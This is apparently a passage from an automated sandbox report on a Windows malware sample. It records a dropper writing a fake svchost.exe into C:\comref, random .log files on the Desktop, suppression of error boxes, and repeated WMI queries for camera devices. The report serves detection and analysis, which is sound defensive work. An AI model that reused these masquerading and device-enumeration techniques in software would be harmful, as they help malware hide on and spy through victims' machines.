Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: jC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: ugRGgCJhQl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ugRGgCJhQl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ugRGgCJhQl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ugRGgCJhQl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ugRGgCJhQl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe File created: C:\comref\__tmp_rar_sfx_access_check_4774343 Jump to behavior
Source: ugRGgCJhQl.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FF640 push ecx; ret 0_2_002FF653
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FEB78 push eax; ret 0_2_002FEB96
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB785427 push ebx; ret 14_2_00007FFAAB785434
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB94767C push ds; ret 14_2_00007FFAAB94769A
Source: C:\comref\svchost.exe Code function: 14_2_00007FFAAB947E28 push ebx; ret 14_2_00007FFAAB947E3A
Source: svchost.exe.0.dr Static PE information: section name: .text entropy: 7.557579213001608

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe File created: C:\comref\svchost.exe Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\LMrHnriI.log Jump to dropped file
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe File created: C:\comref\svchost.exe Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\ThQetCXk.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\ApTjSBhc.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\eVuUdNSS.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\jIMTFKhG.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\LMrHnriI.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\eVuUdNSS.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\ThQetCXk.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\jIMTFKhG.log Jump to dropped file
Source: C:\comref\svchost.exe File created: C:\Users\user\Desktop\ApTjSBhc.log Jump to dropped file
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\comref\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
